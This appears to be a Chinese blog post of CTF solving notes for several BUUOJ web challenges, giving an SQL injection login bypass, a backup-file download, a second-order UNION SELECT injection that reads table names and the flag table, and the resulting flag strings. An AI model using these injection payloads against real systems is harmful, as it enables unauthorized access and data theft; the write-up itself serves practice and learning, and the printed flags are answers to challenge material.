当前位置: 首页 > article >正文

buuoj WEB做题笔记

[极客大挑战 2019]EasySQL

password输入存在注入: 123'or 1=1 --'

flag{68144110-18b9-4882-93f1-6f6e7b1c67ec}

[极客大挑战 2019]Havefun

看网页源码,发现尾部有一段注释得代码,尝试 /?cat=dog,回显得flag{01c680f5-0d62-4e2c-a805-cfcf6b9252db}

[极客大挑战 2019]PHP

根据页面提示“我有一个良好的备份网站的习惯”,从网站下载www.zip,发现flag.php,得:Syc{dog_dog_dog_dog}

October 2019 Twice SQL Injection

审计源码。

1> 使用 1' union select group_concat(table_name) from information_schema.tables where table_schema=database() # 作为用户名,注册,然后登陆,获得三张表名:flag,news,users

2> 使用 1' union select concat(flag) from flag # 作为用户名,注册,然后登陆,获得flag

flag{fa7f6f08-c2cc-4c72-8ed7-1993959cd35c}


http://www.kler.cn/a/404388.html

相关文章:

  • InstantStyle容器构建指南
  • SpringAOP模拟实现
  • 如何实现3D模型在线展示、互动和分享?
  • JMeter监听器与压测监控之 InfluxDB
  • PostgreSQL学习总结(13)—— PostgreSQL 15.8 如何成就数据库性能王者?
  • 百度世界2024:智能体引领AI应用新纪元
  • scratch二次开发:控制blocks某些块不可以被删除
  • 堤防安全监测系统方案
  • 【C++篇】从基础到进阶:全面掌握C++ List容器的使用
  • 《Vue零基础教程》(2)Vue搭建环境+案例学习
  • 如果接口返回值图片有很长一串码,需要添加前缀
  • 在Linux中使用 epoll 处理TCP连接断开问题
  • Keil+VSCode优化开发体验
  • IOS证书获取(证书profile文件,p12私钥证书,证书私钥密码,Bundle ID)
  • 使用OkHttp进行HTTPS请求的Kotlin实现
  • 物理学:第一性原理
  • 【C语言】遗传算法matlab程序
  • Android 使用Retrofit 以纯二进制文件流上传文件
  • 微信小程序登录注册页面设计(小程序项目)
  • 【python】Python 虚拟环境的常用命令
  • 基于Multisim的汽车尾灯控制电路设计与仿真
  • 01-spring security认证笔记
  • 鸿蒙UI开发与部分布局
  • 城电科技|太阳能智能座椅对零碳园区建设有什么意义?
  • Kafka 工作流程解析:从 Broker 工作原理、节点的服役、退役、副本的生成到数据存储与读写优化
  • oracle数据恢复—通过拼接数据库碎片的方式恢复Oracle数据的案例